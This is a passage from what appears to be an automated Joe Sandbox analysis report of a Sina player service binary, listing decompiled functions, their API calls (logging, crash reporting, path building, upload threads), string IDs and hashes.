                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 00372532
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 00372555
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 00372566
                                                                                                                                                                                                    • ??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z.BASE(00000000), ref: 00372576
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 00372581
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 0037259F
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 003725AE
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 003725FC
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 00372608
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 00372611
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120 ref: 0037262B
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000), ref: 00372634
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037265A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V01@V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@$??6?$basic_ostream@?width@ios_base@std@@$??3@$?sputc@?$basic_streambuf@U?$char_traits@_W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@??6@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CountCurrentD@std@@@1@@DebugOsfx@?$basic_ostream@OutputStringThreadTickUnlock@?$basic_streambuf@V01@@V?$basic_ostream@
                                                                                                                                                                                                    • String ID: )#sinaliveupgrade#[$)- $ApnsHTTP.cpp$discontructor
                                                                                                                                                                                                    • API String ID: 3690423324-3705599970
                                                                                                                                                                                                    • Opcode ID: 33e57d67cc68a611ba104d243e2cb1b9466157f097e844e972f937771bae7f39
                                                                                                                                                                                                    • Instruction ID: bbc8e9f73d2a35c1bfbd3c6052998845cab155283dc2300380989dd1dbb180ad
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33e57d67cc68a611ba104d243e2cb1b9466157f097e844e972f937771bae7f39
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30617471900248DFDF22DF64DD4AB9DBBB8FB05304F004999E40AA7291DB75AA48CF51
                                                                                                                                                                                                    Function 0038CCC0 Relevance: 38.6, APIs: 15, Strings: 7, Instructions: 141windowsleepCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0038CD00
                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 0038CD14
                                                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 0038CD1A
                                                                                                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0038CD2A
                                                                                                                                                                                                    • ?GetVlogLevelHelper@logging@@YAHPBDI@Z.BASE(breakpad\tools\crash_service.cc,00000020), ref: 0038CD3D
                                                                                                                                                                                                    • ??0LogMessage@logging@@QAE@PBDHH@Z.BASE(breakpad\tools\crash_service.cc,00000200,000000FF), ref: 0038CD59
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE ref: 0038CD9D
                                                                                                                                                                                                    • Sleep.KERNEL32(00000032), ref: 0038CDB2
                                                                                                                                                                                                    • ?GetVlogLevelHelper@logging@@YAHPBDI@Z.BASE(breakpad\tools\crash_service.cc,00000020), ref: 0038CDCA
                                                                                                                                                                                                    • ??0LogMessage@logging@@QAE@PBDHH@Z.BASE(breakpad\tools\crash_service.cc,00000205,000000FF), ref: 0038CDEA
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(dumps reported :,?), ref: 0038CE30
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 0038CE41
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 0038CE52
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 0038CE63
                                                                                                                                                                                                    • ??1LogMessage@logging@@QAE@XZ.BASE ref: 0038CE7C
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??6?$basic_ostream@D@std@@@std@@MessageMessage@logging@@U?$char_traits@V01@$Helper@logging@@LevelVlog$DispatchSleepTranslate
                                                                                                                                                                                                    • String ID: clients terminated :$dumps reported :$dumps serviced :$breakpad\tools\crash_service.cc$clients connected :$session ending..$Vll
                                                                                                                                                                                                    • API String ID: 455675919-1082587121
                                                                                                                                                                                                    • Opcode ID: a4518e4d9edee99ce8bfcfb53ab38204b52e80b6ed0b3535b819268a987fc6fe
                                                                                                                                                                                                    • Instruction ID: 1023872722688ff773801679e0d18ab813d581064dac8bcee7709f0becaee6b6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4518e4d9edee99ce8bfcfb53ab38204b52e80b6ed0b3535b819268a987fc6fe
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1151D572E10308ABCF12EBA4EC46F9EBBA8FB04354F140665E515E72D0DB75A904CBA1
                                                                                                                                                                                                    Function 6C580F2D Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 229stringCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _mbschr.MSVCR120(00000000,0000003D,00ED4598,00000000,00000000,00000000), ref: 6C580F4E
                                                                                                                                                                                                      • Part of subcall function 6C5812F9: _mbschr_l.MSVCR120(00000000,00ED4598,00000000,?,6C580F53,00000000,0000003D,00ED4598,00000000,00000000,00000000), ref: 6C581304
                                                                                                                                                                                                    • free.MSVCR120(00000000,00ED4598,00000000,00000000,00000000), ref: 6C580FA9
                                                                                                                                                                                                    • _errno.MSVCR120(00ED4598,00000000,00000000,00000000), ref: 6C580FBE
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,00000000), ref: 6C5B05EA
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,00000000), ref: 6C5B05F5
                                                                                                                                                                                                    • ___wtomb_environ.LIBCMT ref: 6C5B0626
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000004,00ED4598,00000000,00000000,00000000), ref: 6C5B064D
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(00000004,00ED4598,00000000,00000000,00000000), ref: 6C5B066A
                                                                                                                                                                                                    • free.MSVCR120(00ED4C78,00ED4598,00000000,00000000,00000000), ref: 6C5B0698
                                                                                                                                                                                                    • __recalloc_crt.LIBCMT(00000001,00000004,00ED4598,00000000,00000000,00000000), ref: 6C5B06CE
                                                                                                                                                                                                    • strlen.MSVCR120(00000000,00000001,?,00000000,00000000), ref: 6C5B0735
                                                                                                                                                                                                    • _calloc_crt.MSVCR120(-00000002,00000001,?,00000000,00000000), ref: 6C5B073F
                                                                                                                                                                                                    • strlen.MSVCR120(00000000,00000000,?,00000000,00000000), ref: 6C5B074E
                                                                                                                                                                                                    • strcpy_s.MSVCR120(00000000,-00000002,00000000,?,00000000,00000000), ref: 6C5B0759
                                                                                                                                                                                                    • SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 6C5B077C
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,00000000,00000000), ref: 6C5B078A
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,?,?,?,00000000,00000000), ref: 6C5B0796
                                                                                                                                                                                                    • free.MSVCR120(00000000,?,00000000,00000000), ref: 6C5B07A3
                                                                                                                                                                                                      • Part of subcall function 6C580EE6: _mbsnbicoll.MSVCR120(00000000,00000000,00ED4598,00ED4C78,00000000,?,6C580F92,00000000,00000000,00ED4598,00000000,00000000,00000000), ref: 6C580F01
                                                                                                                                                                                                    • _invoke_watson.MSVCR120(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 6C5B07BB
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$_errno$_malloc_crtstrlen$EnvironmentVariable___wtomb_environ__recalloc_crt_calloc_crt_invalid_parameter_noinfo_invoke_watson_mbschr_mbschr_l_mbsnbicollstrcpy_s
                                                                                                                                                                                                    • String ID: xL
                                                                                                                                                                                                    • API String ID: 1943959764-2859553101
                                                                                                                                                                                                    • Opcode ID: d70f6c83849010633ca2f9b93cec3da04a8334b39ef6933848d22eb1b0f38a86
                                                                                                                                                                                                    • Instruction ID: e6aead62b99ee8abc7e759eebefa929010e986087a795ab4cefaa79028e373bc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d70f6c83849010633ca2f9b93cec3da04a8334b39ef6933848d22eb1b0f38a86
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C27108B1506362EFEB019F79DE50B9A7B74EBC2368F204617D810A7A90D734D841CF95
                                                                                                                                                                                                    Function 0037F8A0 Relevance: 36.9, APIs: 17, Strings: 4, Instructions: 199COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?Get@PathService@@SA_NHPAVFilePath@base@@@Z.BASE(0000006E,?,8285FFAB), ref: 0037F8D1
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?,Sina,Sina), ref: 0037F944
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037F953
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037F95C
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037F972
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?,SinaPlayer,SinaPlayer), ref: 0037F9D1
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037F9DA
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037F9E3
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037F9F9
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?,User Data,User Data), ref: 0037FA5E
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037FA67
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037FA70
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037FA86
                                                                                                                                                                                                    • ?Append@FilePath@base@@QBE?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.BASE(?,?,version_cfg,version_cfg), ref: 0037FAE5
                                                                                                                                                                                                    • ??4FilePath@base@@QAEAAV01@ABV01@@Z.BASE(00000000), ref: 0037FAEE
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 0037FAF7
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037FB06
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Path@base@@$??3@Append@U?$char_traits@_V01@V01@@V12@V?$allocator@_V?$basic_string@_W@2@@std@@@W@std@@$Get@PathPath@base@@@Service@@
                                                                                                                                                                                                    • String ID: Sina$SinaPlayer$User Data$version_cfg
                                                                                                                                                                                                    • API String ID: 160063777-2757115113
                                                                                                                                                                                                    • Opcode ID: f3762bbf50005efcf99a127fba71b9b072d7d8d70e2abf8195efe2a732e96c83
                                                                                                                                                                                                    • Instruction ID: 036611f6fd7d163ada6af55d44de9b5c9cbc37112dd5ae900cdf8da7ee9e772a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3762bbf50005efcf99a127fba71b9b072d7d8d70e2abf8195efe2a732e96c83
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8171E375910248DFCF16EBE4C855BEEBBB9FF05318F15416DD40A67280EB791A04CBA1
                                                                                                                                                                                                    Function 0037C600 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 148threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037C64C
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037C66F
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037C6A9
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0037C6F6
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037C716
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037C733
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,6C6C56E0), ref: 0037C756
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,?,?,?,?,?,?,?,?,6C6C56E0), ref: 0037C767
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_N@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6C56E0), ref: 0037C781
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6C56E0), ref: 0037C792
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6C56E0), ref: 0037C79A
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 0037C7B8
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037C7C7
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037C82A
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037C836
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0037C83F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$??6?$basic_ostream@V01@V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@$?width@ios_base@std@@$?sputc@?$basic_streambuf@U?$char_traits@_W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@??3@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CountCurrentD@std@@@1@@DebugOsfx@?$basic_ostream@OutputStringThreadTickV01@@V01@_
                                                                                                                                                                                                    • String ID: failed_times = $)#sinaclient#[$)- $TerminateUploadThread need_upload = $upload_mgr.cpp
                                                                                                                                                                                                    • API String ID: 4049907418-1469293971
                                                                                                                                                                                                    • Opcode ID: a7c4367f8f389b9ff6f1d1aae1928f18f5a648887ddbf6d70ce7a9fc8b6cf344
                                                                                                                                                                                                    • Instruction ID: 4c3d4c4861d58be216c630808e000d6e47bb887b5bdf9718305e1a2a15da6ae5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7c4367f8f389b9ff6f1d1aae1928f18f5a648887ddbf6d70ce7a9fc8b6cf344
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57516075900249DFDF22EFA4DD0ABDDBBB8FB04304F00859AE409AB291DB759A44CF61
                                                                                                                                                                                                    Function 00371E70 Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 152threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB), ref: 00371EF3
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 00371F13
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 00371F4D
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00371F84
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00371FA1
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 00371FBE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
